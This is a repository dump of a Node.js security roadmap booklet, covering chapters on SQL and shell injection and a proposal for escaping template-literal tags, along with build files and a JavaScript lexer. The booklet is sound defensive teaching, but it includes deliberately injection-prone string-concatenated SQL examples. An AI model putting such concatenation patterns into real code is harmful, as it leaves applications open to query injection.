25 | ```js
26 | connection.query(
27 | "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'",
28 | callback);
29 | ```
30 |
31 | to make query injection a real problem.
32 |
33 |
34 | Developers may not know about prepared statements, but prepared
35 | statements have other problems:
36 |
37 | * They rely on a **correspondence between positional parameters**
38 | and the '`?`'s placeholders that they fill. When a prepared statement
39 | has more substitutions than fit in a reader's working memory, they
40 | have to look back and forth between the prepared statement, and the
41 | parameter list.
42 | * Prepared statements do not make it easy to **compose a query** from
43 | simpler query fragments. It's not easy to compute the `WHERE`
44 | clause separately from the result column set and then combine the
45 | two into a query without resorting to string concatenation
46 | somewhere along the line.
47 |
48 |
49 | ## Template literals
50 |
51 | JavaScript has a rarely used feature that lets us get the best of
52 | both worlds.
53 |
54 |
55 | ```js
56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback)
57 | ```
58 |
59 | uses a [tagged template literal][] to allow inline expressions in SQL
60 | syntax.
61 |
62 | > A more advanced form of template literals are tagged template
63 | > literals. Tags allow you to parse template literals with a
64 | > function. The first argument of a tag function contains an array of
65 | > string values. The remaining arguments are related to the
66 | > expressions. In the end, your function can return your manipulated
67 | > string (or it can return something completely different ...).
68 |
69 | The code above is almost equivalent to
70 |
71 | ```js
72 | connection.query(
73 | ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''],
74 | x y z
75 | )(callback);
76 | ```
77 |
78 | `connection.query` gets called with the parts of the static
79 | template string specified by the author, followed by the results of
80 | the expressions. The final `(callback)` dispatches the query.
81 |
82 | We can tweak SQL APIs so that, when used as template literal tags,
83 | they escape the dynamic parts to preserve the intent of the author of
84 | the static parts, and then re-interleave them to produce the query.
85 |
86 | The example ([code][sql-code]) accompanying this chapter implements
87 | this idea by defining a `mysql.sql` function that parses the static
88 | parts to choose appropriate escapers for the dynamic parts.
89 | We have put together a [draft PR][mysql-PR] to integrate this into
90 | the *mysql* module.
91 |
92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to
93 | make it easy to compose complex queries from simpler parts:
94 |
95 | ```js
96 | // Compose a query from two fragments.
97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens.
98 | connection.query`
99 | SELECT ${outputColumnsAndJoins(a, b, c)}
100 | WHERE ${rowFilter(x, y, z)}
101 | `(callback)
102 |
103 | // Returns a SqlFragment
104 | function rowFilter(x, y, z) {
105 | if (complexCondition) {
106 | // mysql.sql returns a SqlFragment
107 | return mysql.sql`X = ${x}`;
108 | } else {
109 | return mysql.sql`Y = ${y} AND Z=${z}`;
110 | }
111 | }
112 |
113 | function outputColumnsAndJoins(a, b, c) {
114 | return mysql.sql`...`;
115 | }
116 | ```
117 |
118 | ----
119 |
120 | Our goal was to make the easiest way to express an idea a secure way.
121 |
122 | As seen below, this template tag API is the shortest way to express
123 | this idea as shown below. It is also tolerant to small variations
124 | — the author may leave out quotes since the tag implementation
125 | knows whether a substitution is inside quotes.
126 |
127 | Shorter & tolerant != easier, but we hope that being shorter, more
128 | robust, more secure, and easy to compose will make it a good migration
129 | target for teams that realize they have a problem with SQL injection.
130 | We also hope these factors will cause developers who have been through
131 | such a migration to continue to use it in subsequent projects where it
132 | may spread to other developers.
133 |
134 |
135 | ```js
136 | // Proposed: Secure, tolerant, composes well.
137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback)
138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback)
139 |
140 | // String concatenation. Insecure, composes well.
141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)
143 |
144 | // String concatenation is not tolerant.
145 | // Broken in a way that will be caught during casual testing.
146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback)
147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)
148 |
149 | // Prepared Statements. Secure, composes badly, positional parameters.
150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback)
151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback) // Subtly broken
152 | ```
153 |
154 |
155 |
156 | [`mysql`]: https://www.npmjs.com/package/mysql
157 | [QUI]: ../chapter-1/threat-QUI.md
158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926
162 |
--------------------------------------------------------------------------------
/chapter-7/structured-strings.md:
--------------------------------------------------------------------------------
1 | # Structured Strings
2 |
3 | Both of the previously discussed problems, query injection and shell
4 | injection, are facets of a common problem: it is hard to securely
5 | compose strings to send outside the process. In the first case,
6 | we send a query string to a database via a file descriptor bound to a
7 | network socket or an IPC endpoint. In the second, we send a string
8 | via a syscall wrapper, to spawn a child process.
9 |
10 | ## Success Criteria
11 |
12 | We can securely compose strings for external endpoints if:
13 |
14 | * Developers routinely use tools to produce structured strings
15 | that preserve developers' intent even in the face of inputs
16 | crafted by a skilled attacker, and/or
17 | * Where developers do not, the backends grant no authority based on
18 | the structure of the string, and the authority granted ambiently is
19 | so small as to not be abusable.
20 |
21 | Nailing down the definition of *intent* is hard, but here's an example
22 | of how we can in one context. Consider
23 |
24 | ```js
25 | "SELECT * FROM T WHERE id=" + f(accountNumber)
26 | ```
27 |
28 | A reasonable reader would conclude that the author intended:
29 |
30 | * That the result specifies one statement, a select statement.
31 | * That `f(accountNumber)` specifies only a simple value that
32 | can be compared to values in the *id* column.
33 |
34 | Given that, we can say `function f(x)` preserves intent in that code
35 | if, for any value of `accountNumber`, it throws an exception or
36 | its output following "`SELECT * FROM T WHERE id=`" parses as a
37 | single number or string literal token.
38 |
39 |
40 |
41 | ## A possible solution
42 |
43 | ### Change the world so we can give simple answers to hard questions.
44 |
45 | Extend existing APIs so that whenever a developer is composing a
46 | string to send outside the `node` process, they have a template
47 | literal tag based API that is more secure than string concatenation.
48 |
49 | Then, we can give developers a simple piece of advice:
50 |
51 | > If you're composing a string that will end up outside node, use
52 | > a template tag.
53 |
54 | Template tags will have implementation bugs, but fixing one template
55 | tag is easier than fixing many expressions of the form
56 | `("foo " + bar + " baz")`.
57 |
58 |
59 | ### A common style guide for tag implementers.
60 |
61 | It would help developers if these template literal tags had some
62 | consistency across libraries. We've already briefly discussed ways to
63 | make template tags more discoverable and usable when talking about
64 | ways to treat [generated code][synthetic modules] as first class.
65 |
66 | We propose a style guide for tag authors.
67 | Others will probably have better ideas as to what it should contain, but
68 | to get a discussion started:
69 |
70 | - Functions that compose or represent a string whose recipient is outside
71 | the node runtime should accept template tags.
72 | Examples include `mysql.format` which composes a string of SQL.
73 | - These functions should return a typed string wrapper.
74 | For example, if the output is a string of *SQL* tokens,
75 | then return an instance of:
76 | ```js
77 | function SqlFragment(s) {
78 | if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
79 | this.content = String(s);
80 | }
81 | SqlFragment.prototype.toString = (() => this.content);
82 | ```
83 | Don't re-escape `SqlFragment`s received as interpolation values
84 | where they make sense.
85 | - See if you can reuse string wrappers from a library before rolling
86 | your own to encourage interoperability.
87 | If a library defines a type representing a fragment of HTML, use that
88 | as long as your operator can uphold the type's contract.
89 | For example if the type has a particular [security contract][],
90 | make sure that you preserve that security contract.
91 | You may assume that wrapped strings come from a source that upheld
92 | the contract.
93 | Producing a value that doesn't uphold its contract when your inputs do
94 | is a bug, but assuming incorrectly that type contracts hold for your
95 | inputs is not.
96 | If you can double check inputs, great!
97 | - The canonical way to test whether a function was (very probably)
98 | called as a template tag is
99 | ```js
100 | function (a, ...b) {
101 | if (Array.isArray(a) && Array.isArray(a.raw)
102 | && Object.isFrozen(a)
103 | && a.length === b.length + 1) {
104 | // Treat as template tag.
105 | }
106 | // Handle non template tag use.
107 | }
108 | ```
109 | - When a template tag takes options objects, it should
110 | be possible to curry those before invoking the function as a tag.
111 | The following passes some environment variables and a working directory
112 | before the command:
113 | ```js
114 | shelljs.exec({ env: ..., cwd: ... })`cat ...`
115 | ```
116 | - When a template tag takes a `callback`, the template tag should
117 | return a function that will receive the callback.
118 | The following uses a template tag that returns a function that
119 | takes a callback:
120 | ```js
121 | myConnection.query`SELECT ...`(callback)
122 | ```
123 | - Where possible, allow indenting multi-line template tags.
124 | Use the first line with non-whitespace characters as a cue
125 | when stripping whitespace from the rest of the lines.
126 |
127 | ## Alternatives
128 |
129 | Database abstractions like object-relational mappings are a great way
130 | to get developers out of the messy business of composing queries.
131 |
132 | There are still niche use cases like ad-hoc reporting that require
133 | composing queries, and solving the problem for database queries does
134 | not solve it for strings sent elsewhere, e.g. shells.
135 |
136 | Builder APIs provide a flexible way to compose structured content.
137 | For example,
138 |
139 | ```java
140 | new QueryBuilder()
141 | .select()
142 | .innerJoin(...).on(...)
143 | .columns(...)
144 | .where(...)
145 | .orderBy(...)
146 | .build()
147 | ```
148 |
149 | The explicit method calls specify the structure of the resulting
150 | string, so controlling parameters doesn't grant control of sentence
151 | structure, and control of one parameter doesn't allow reinterpreting
152 | part of the query specified by an uncontrolled parameter.
153 |
154 | In JavaScript we prefer tagged templates to builders. These APIs can
155 | be syntactically heavy and developers have to discover and learn them.
156 | We hope that adoption with template tags will be easier because:
157 |
158 | * Tagged templates are syntactically lighter so easier to write.
159 | * Someone unfamiliar with the API, but familiar with the query language, will
160 | have to do less work to leverage the one to understand the other making
161 | tagged templates easier to read and adapt for one's own work.
162 | * Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
163 | as strings unless there is a builder API for the sub-language.
164 |
165 |
166 | [security contract]: https://github.com/google/safe-html-types
167 | [synthetic modules]: ../chapter-2/synthetic-modules.html
168 |
--------------------------------------------------------------------------------
/cover.md:
--------------------------------------------------------------------------------
1 | # A Roadmap for Node.js Security
2 |
3 | Node.js has a vibrant community of application developers and library
4 | authors built around a mature and well-maintained core runtime and
5 | library set. Its growing popularity is already drawing more attention
6 | from attackers. This roadmap discusses how some Node.js projects
7 | address security challenges, along with ways to make it easier
8 | for more projects to address these challenges in a thorough and
9 | consistent manner.
10 |
11 | This is not the opinion of any organization. It is the considered
12 | opinion of
13 | [some computer security professionals and Node.js enthusiasts][contributors]
14 | who have worked to make it easier to write secure, robust software on
15 | other platforms; who like a lot about Node.js; and who would like to
16 | help make it better.
17 |
18 | Our intended audience is Node.js library and infrastructure
19 | maintainers who want to stay ahead of the increased scrutiny that
20 | Node.js is getting from attackers. We have not researched whether,
21 | and do not assert that, any stack is inherently more or less secure
22 | than any other.
23 |
24 | Node.js security is especially important for “primary targets”.
25 | Targets are often subdivided into "primary targets" and "targets of
26 | opportunity." One attacks the latter if one happens to see a
27 | vulnerability. One goes out of their way to find vulnerabilities in
28 | the former. The practices which prevent one from becoming a target of
29 | opportunity might not be enough if one is a primary target of an actor
30 | with resources at their disposal. We hope that the ideas we present
31 | might help primary targets to defeat attacks while making targets of
32 | opportunity rarer and the entire ecosystem more secure.
33 |
34 | When addressing threats, we want to make sure we preserve Node.js's
35 | strengths.
36 |
37 | * Development teams can iterate quickly allowing them to explore a
38 | large portion of the design space.
39 | * Developers can use a wealth of publicly available packages to solve
40 | everyday problems.
41 | * Anyone who identifies a shared problem can write and publish a
42 | module to solve it, or send a pull request with a fix or extension
43 | to an existing project.
44 | * Node.js integrates with a wide variety of application containers so
45 | project teams have options when deciding how to deploy.
46 | * Using JavaScript on the front and back ends of Web applications
47 | allows developers to work both sides when need be.
48 |
49 | The individual chapters are largely independent of one another:
50 |
51 | "[Threat environment][]" discusses the kinds of threats that concern us.
52 |
53 | "[Dynamism when you need it][]" discusses how to preserve the power of
54 | CommonJS module linking, `vm` contexts, and runtime code generation
55 | while making sure that, in production, only code that the development
56 | team trusts gets run.
57 |
58 | "[Knowing your dependencies][]" discusses ways to help development
59 | teams make informed decisions about third-party dependencies.
60 |
61 | "[Keeping your dependencies close][]" discusses how keeping a local
62 | replica of portions of the larger npm repository affects security and
63 | aids incident response.
64 |
65 | "[Oversight][]" discusses how code-quality tools can help decouple
66 | security review from development.
67 |
68 | "[When all else fails][]" discusses how the development →
69 | production pipeline and development practices can affect the ability
70 | of security professionals to identify and respond to imminent threats.
71 |
72 | "[Library support for safe coding practices][]" discusses idioms
73 | that, if more widespread, might make it easier for developers to
74 | produce secure, robust systems.
75 |
76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.
77 |
78 | [contributors]: CONTRIBUTORS.md
79 | [Threat environment]: chapter-1/threats.md
80 | [Dynamism when you need it]: chapter-2/dynamism.md
81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md
82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md
83 | [Oversight]: chapter-5/oversight.md
84 | [When all else fails]: chapter-6/failing.md
85 | [Library support for safe coding practices]: chapter-7/libraries.md
86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/
87 |
--------------------------------------------------------------------------------
/images/FileExternal.svg:
--------------------------------------------------------------------------------
1 |
2 |
6 |
10 |
--------------------------------------------------------------------------------
/images/GitHub-Mark-32px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png
--------------------------------------------------------------------------------
/images/ic_print_24dp.svg:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/images/npmjs-node.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png
--------------------------------------------------------------------------------
/license.md:
--------------------------------------------------------------------------------
1 |
3 |
4 |
5 | A Roadmap for Node.js Security by https://github.com/google/node-sec-roadmap/ is licensed under a Creative Commons Attribution 4.0 International License.
6 |
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "1.0.0",
3 | "name": "@mikesamuel/nodejs_sec_book",
4 | "description": "Booklet about NodeJS in organizations with large security profiles",
5 | "homepage": "https://github.com/google/node-sec-roadmap/",
6 | "license": "(Apache License 2.0 OR CC-BY-4.0)",
7 | "author": {
8 | "name": "Mike Samuel",
9 | "email": "mikesamuel@gmail.com",
10 | "url": "https://github.com/mikesamuel"
11 | },
12 | "files": [
13 | "www/**"
14 | ],
15 | "main": "www/index.html",
16 | "dependencies": {
17 | "gitbook": ">=3.2.3",
18 | "gitbook-cli": ">=2.3.2",
19 | "gitbook-plugin-ga": "^1.0.1",
20 | "gitbook-plugin-links": "^3.0.1",
21 | "svgexport": "^0.3.2"
22 | },
23 | "private": true,
24 | "scripts": {
25 | "start": "make serve"
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | .print-button.btn.links-link {
19 | display: inline-block;
20 | width: 30px;
21 | font-size: 0;
22 | background-image: url("/images/ic_print_24dp.svg");
23 | background-repeat: no-repeat;
24 | background-position: center center;
25 | }
26 |
27 | .github-button.btn.links-link {
28 | display: inline-block;
29 | width: 30px;
30 | font-size: 0;
31 | background-image: url("/images/GitHub-Mark-32px.png");
32 | background-repeat: no-repeat;
33 | background-position: center center;
34 | background-size: 20px;
35 | opacity: 0.25;
36 | }
37 |
38 | /* Style external links */
39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]),
40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]),
41 | a[href^="//"]:not([href^="//www.gitbook.com"]) {
42 | background-image: url("/images/FileExternal.svg");
43 | background-position: center right;
44 | background-repeat: no-repeat;
45 | background-size: 12px 12px;
46 | padding-right: 14px;
47 | }
48 |
--------------------------------------------------------------------------------
/third_party/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright 2017 Google LLC
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # https://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
--------------------------------------------------------------------------------
/third_party/jslex/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright 2017 Google LLC
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # https://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
--------------------------------------------------------------------------------
/third_party/jslex/jslex.py:
--------------------------------------------------------------------------------
1 | # Copyright 2011-2015 Ned Batchelder. All rights reserved.
2 | #
3 | # Except where noted otherwise, this software is licensed under the Apache
4 | # License, Version 2.0 (the "License"); you may not use this work except in
5 | # compliance with the License. You may obtain a copy of the License at
6 | #
7 | # http://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt
17 |
18 |
19 | """JsLex: a lexer for Javascript"""
20 |
21 | import re
22 |
23 | class Tok(object):
24 | """A specification for a token class."""
25 |
26 | num = 0
27 |
28 | def __init__(self, name, regex, next=None):
29 | self.id = Tok.num
30 | Tok.num += 1
31 | self.name = name
32 | self.regex = regex
33 | self.next = next
34 |
35 | def literals(choices, prefix="", suffix=""):
36 | """Create a regex from a space-separated list of literal `choices`.
37 |
38 | If provided, `prefix` and `suffix` will be attached to each choice
39 | individually.
40 |
41 | """
42 | return "|".join(prefix+re.escape(c)+suffix for c in choices.split())
43 |
44 | class Lexer(object):
45 | """A generic multi-state regex-based lexer."""
46 |
47 | def __init__(self, states, first):
48 | self.regexes = {}
49 | self.toks = {}
50 |
51 | for state, rules in states.items():
52 | parts = []
53 | for tok in rules:
54 | groupid = "t%d" % tok.id
55 | self.toks[groupid] = tok
56 | parts.append("(?P<%s>%s)" % (groupid, tok.regex))
57 | self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE)
58 |
59 | self.state = first
60 |
61 | def lex(self, text):
62 | """Lexically analyze `text`.
63 |
64 | Yields pairs (`name`, `tokentext`).
65 |
66 | """
67 | end = len(text)
68 | state = self.state
69 | regexes = self.regexes
70 | toks = self.toks
71 | start = 0
72 |
73 | while start < end:
74 | for match in regexes[state].finditer(text, start):
75 | name = match.lastgroup
76 | tok = toks[name]
77 | toktext = match.group(name)
78 | start += len(toktext)
79 | yield (tok.name, toktext)
80 |
81 | if tok.next:
82 | state = tok.next
83 | break
84 |
85 | self.state = state
86 |
87 |
88 | class JsLexer(Lexer):
89 | """A Javascript lexer
90 |
91 | >>> lexer = JsLexer()
92 | >>> list(lexer.lex("a = 1"))
93 | [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]
94 |
95 | This doesn't properly handle non-Ascii characters in the Javascript source.
96 |
97 | """
98 |
99 | # Because these tokens are matched as alternatives in a regex, longer possibilities
100 | # must appear in the list before shorter ones, for example, '>>' before '>'.
101 | #
102 | # Note that we don't have to detect malformed Javascript, only properly lex
103 | # correct Javascript, so much of this is simplified.
104 |
105 | # Details of Javascript lexical structure are taken from
106 | # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf
107 |
108 | # A useful explanation of automatic semicolon insertion is at
109 | # http://inimino.org/~inimino/blog/javascript_semicolons
110 |
111 | both_before = [
112 | Tok("comment", r"/\*(.|\n)*?\*/"),
113 | Tok("linecomment", r"//.*?$"),
114 | Tok("ws", r"\s+"),
115 | Tok("keyword", literals("""
116 | break case catch class const continue debugger
117 | default delete do else enum export extends
118 | finally for function if import in instanceof new
119 | return super switch this throw try typeof var
120 | void while with
121 | """, suffix=r"\b"), next='reg'),
122 | Tok("reserved", literals("null true false", suffix=r"\b"), next='div'),
123 | Tok("id", r"""
124 | ([a-zA-Z_$ ]|\\u[0-9a-fA-Z]{4}) # first char
125 | ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})* # rest chars
126 | """, next='div'),
127 | Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'),
128 | Tok("onum", r"0[0-7]+"),
129 | Tok("dnum", r"""
130 | ( (0|[1-9][0-9]*) # DecimalIntegerLiteral
131 | \. # dot
132 | [0-9]* # DecimalDigits-opt
133 | ([eE][-+]?[0-9]+)? # ExponentPart-opt
134 | |
135 | \. # dot
136 | [0-9]+ # DecimalDigits
137 | ([eE][-+]?[0-9]+)? # ExponentPart-opt
138 | |
139 | (0|[1-9][0-9]*) # DecimalIntegerLiteral
140 | ([eE][-+]?[0-9]+)? # ExponentPart-opt
141 | )
142 | """, next='div'),
143 | Tok("punct", literals("""
144 | >>>= === !== >>> <<= >>= <= >= == != << >> &&
145 | || += -= *= %= &= |= ^=
146 | """), next="reg"),
147 | Tok("punct", literals("++ -- ) ]"), next='div'),
148 | Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
149 | Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
150 | Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
151 | ]
152 |
153 | both_after = [
154 | Tok("other", r"."),
155 | ]
156 |
157 | states = {
158 | 'div': # slash will mean division
159 | both_before + [
160 | Tok("punct", literals("/= /"), next='reg'),
161 | ] + both_after,
162 |
163 | 'reg': # slash will mean regex
164 | both_before + [
165 | Tok("regex",
166 | r"""
167 | / # opening slash
168 | # First character is..
169 | ( [^*\\/[] # anything but * \ / or [
170 | | \\. # or an escape sequence
171 | | \[ # or a class, which has
172 | ( [^\]\\] # anything but \ or ]
173 | | \\. # or an escape sequence
174 | )* # many times
175 | \]
176 | )
177 | # Following characters are same, except for excluding a star
178 | ( [^\\/[] # anything but \ / or [
179 | | \\. # or an escape sequence
180 | | \[ # or a class, which has
181 | ( [^\]\\] # anything but \ or ]
182 | | \\. # or an escape sequence
183 | )* # many times
184 | \]
185 | )* # many times
186 | / # closing slash
187 | [a-zA-Z0-9]* # trailing flags
188 | """, next='div'),
189 | ] + both_after,
190 | }
191 |
192 | def __init__(self):
193 | super(JsLexer, self).__init__(self.states, 'reg')
194 |
195 |
196 | def js_to_c_for_gettext(js):
197 | """Convert the Javascript source `js` into something resembling C for xgettext.
198 |
199 | What actually happens is that all the regex literals are replaced with
200 | "REGEX".
201 |
202 | """
203 | def escape_quotes(m):
204 | """Used in a regex to properly escape double quotes."""
205 | s = m.group(0)
206 | if s == '"':
207 | return r'\"'
208 | else:
209 | return s
210 |
211 | lexer = JsLexer()
212 | c = []
213 | for name, tok in lexer.lex(js):
214 | if name == 'regex':
215 | # C doesn't grok regexes, and they aren't needed for gettext,
216 | # so just output a string instead.
217 | tok = '"REGEX"'
218 | elif name == 'string':
219 | # C doesn't have single-quoted strings, so make all strings
220 | # double-quoted.
221 | if tok.startswith("'"):
222 | guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
223 | tok = '"' + guts + '"'
224 | elif name == 'id':
225 | # C can't deal with Unicode escapes in identifiers. We don't
226 | # need them for gettext anyway, so replace them with something
227 | # innocuous
228 | tok = tok.replace("\\", "U")
229 | c.append(tok)
230 | return ''.join(c)
231 |
--------------------------------------------------------------------------------